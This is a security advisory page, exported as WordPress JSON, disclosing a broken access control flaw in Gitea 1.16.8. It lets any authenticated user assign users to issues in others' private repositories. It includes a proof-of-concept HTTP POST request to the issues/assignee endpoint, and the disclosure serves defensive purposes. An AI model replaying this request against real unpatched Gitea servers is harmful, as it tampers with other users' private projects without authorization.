{"id":23002,"date":"2022-10-31T12:21:00","date_gmt":"2022-10-31T11:21:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=23002"},"modified":"2024-07-24T11:39:30","modified_gmt":"2024-07-24T09:39:30","slug":"usd-2022-0025","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0025\/","title":{"rendered":"usd-2022-0025"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.17.6\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0025 | Broken Access Control in Issue Assignees<\/h2>\n

Advisory ID<\/strong>: usd-2022-0025
\nProduct<\/strong>: Gitea
\nAffected Version<\/strong>: 1.16.8
\nVulnerability Type<\/strong>: https:\/\/cwe.mitre.org\/data\/definitions\/284.html<\/a>
\nSecurity Risk<\/strong>: Medium
\nVendor URL<\/strong>: https:\/\/gitea.io\/<\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status<\/strong>: Fixed
\nAdvisory Status<\/strong>: Closed
\nCVE number<\/strong>: Not requested yet
\nCVE Link<\/strong>: Not requested yet
\nFirst Published<\/strong>: Not published yet
\nLast Update<\/strong>: 2022-06-30<\/p>\n

Description<\/h3>\n

Gitea allows users to assign other users to issues.
\nDue to improper access control, any authenticated user can assign a user to arbitrary issues.<\/p>\n

Proof of Concept<\/h3>\n

In the request below, the issue with id 4<\/strong> does not belong to the authenticated user.
\nThe repo where this issue lives is a private repo of another user.
\nThe user with ID 1<\/strong> is the admin user, which is assign to issue 4<\/strong> by an arbitrary user which should usually not have the permissions to do this.<\/p>\n

\n
<\/span>POST<\/span> \/testuser\/test222\/issues\/assignee<\/span> HTTP<\/span>\/<\/span>1.1<\/span>
Host<\/span>:<\/span> localhost:3000<\/span>
Content-Length<\/span>:<\/span> 105<\/span>
Pragma<\/span>:<\/span> no-cache<\/span>
Cache-Control<\/span>:<\/span> no-cache<\/span>
Accept<\/span>:<\/span> *\/*<\/span>
Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
X-Requested-With<\/span>:<\/span> XMLHttpRequest<\/span>
User-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.99 Safari\/537.36<\/span>
Origin<\/span>:<\/span> [http:\/\/localhost:3000]()<\/span>
Accept-Encoding<\/span>:<\/span> gzip, deflate<\/span>
Accept-Language<\/span>:<\/span> en-US,en;q=0.9<\/span>
Cookie<\/span>:<\/span> XXX<\/span>
Connection<\/span>:<\/span> close<\/span>\n

\n_csrf=fG[REDACTED]&action=&issue_ids=4&id=1\n<\/pre>\n<\/div>\n
Fix<\/h3>\n
It is recommended to restrict access to sensitive functions or information by default.
\nRequired access privileges should be granted explicitly by a global access control mechanism.<\/p>\n
References<\/h3>\n